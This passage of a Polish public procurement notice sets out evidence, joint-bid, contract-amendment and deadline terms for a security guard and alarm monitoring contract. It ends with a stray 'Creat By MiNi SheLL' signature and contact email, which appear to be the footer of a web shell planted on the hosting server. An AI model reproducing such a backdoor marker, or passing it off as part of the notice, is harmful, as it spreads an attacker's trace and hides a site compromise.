tzn. co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi spełnić powyższe kryterium tzn. wykonać opisane usługi,<br/>b)	ust. 2 pkt 4) lit. b mogą spełniać wspólnie / łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">odpis lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji – bądź wskazania danych, pod którym Zamawiający samodzielnie może pobrać wymagany dokument.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca na wezwania zamawiającego zobowiązany będzie złożyć następujące podmiotowe środki dowodowe:<br/>a)	poświadczoną za zgodność z oryginałem kopię koncesji MSW na prowadzenie działalności w zakresie ochrony osób i mienia w formie bezpośredniej ochrony fizycznej stałej lub doraźnej oraz polegającej na stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych, <br/>b)	wykaz pracowników ochrony, którzy będą uczestniczyć w wykonywaniu zamówienia składany na potwierdzenie warunków udziału w postępowaniu - Załącznik nr 6 do SWZ<br/>c)	wykaz zrealizowanych usług zrealizowanych w zakresie niezbędnym do oceny spełnienia warunków postępowania wraz z dowodami potwierdzającymi, że usługi zostały wykonane lub są wykonywane należycie - Załącznik nr 7 A do SWZ<br/>wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;<br/>d)	odpis lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji – bądź wskazania danych, pod którym Zamawiający samodzielnie może pobrać wymagany dokument,<br/>e)	oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w art. 109 ust. 1 pkt. 5, 7-9 ustawy.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (w tym spółka<br/>cywilna) do oferty należy dołączyć pełnomocnictwo dla pełnomocnika do reprezentowania<br/>Wykonawców występujących wspólnie w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i do zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo musi jednoznacznie wynikać z umowy lub z innej czynności prawnej, mieć<br/>formę zgodną z określoną w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r.<br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie, powinno również w swej treści zawierać<br/>wskazanie niniejszego postępowania.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zmówienia dołączają ww. pełnomocnictwo<br/>lub umowę regulującą współpracę konsorcjum, z której wynika ustanowione pełnomocnictwo.<br/>Spółka cywilna dołącza ww. pełnomocnictwo lub dokument, z którego wynika ww. pełnomocnictwo.<br/>3. Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub<br/>nienależyte wykonanie zamówienia.<br/>4. Oferta podpisana przez pełnomocnika musi być prawnie wiążąca, łącznie i z osobna dla<br/>wszystkich podmiotów składających ofertę.<br/>5. Pełnomocnik będzie upoważniony do zaciągania zobowiązań w imieniu i na rzecz każdego i<br/>wszystkich podmiotów składających wspólną ofertę.<br/>6. Realizacja całości kontraktu łącznie z płatnościami będzie dokonywana wyłącznie przez<br/>pełnomocnika reprezentującego podmioty występujące wspólnie.<br/>7. Wszystkie podmioty składające wspólną ofertę będą odpowiedzialne na zasadach<br/>określonych w Kodeksie cywilnym.<br/>8. Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający może<br/>zażądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej<br/>współpracę tych Wykonawców.<br/>9. Do Wykonawców wspólnie ubiegających się o udzielenie zamówienia stosuje się dyspozycję<br/>art. 117 ust. 3 ustawy, z uwzględnieniem art. 117 ust. 4 ustawy. W przypadku, o którym mowa w<br/>art. 117 ust. 3 ustawy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają<br/>do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni<br/>Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Strony Umowy dopuszczają dokonanie zmian Umowy w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu Umowy.<br/>Strony zobowiązują się dokonać zmiany wysokości wynagrodzenia należnego Wykonawcy, o którym mowa w § 5 ust. 1 i 2 w formie pisemnego aneksu, każdorazowo w przypadku wystąpienia jednej z następujących okoliczności:<br/>1)	zmiany stawki podatku od towarów i usług;<br/>2)	zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę;<br/>3)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne;<br/>4)	zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych<br/>Strony zobowiązują się dokonać zmiany umowy spowodowane sytuacją epidemiczną związaną z wystąpieniem epidemii koronawirusa SARS COV 2 i chorobą COVID 19 – w takim przypadku możliwość zmiany Umowy w zakresie niezbędnym do usunięcia przeszkód będących wynikiem epidemii, które uniemożliwiają Stronom należyte wykonanie Umowy, przy czym zmiana Umowy może nastąpić jedynie w przypadku przedstawienia przez Stronę wnioskującą o zmianę Umowy dowodów potwierdzających realny i obiektywny wpływ sytuacji epidemicznej na brak możliwości prawidłowej realizacji Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma Zakupowa ZUOP: https://zuop.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-21 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-19</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com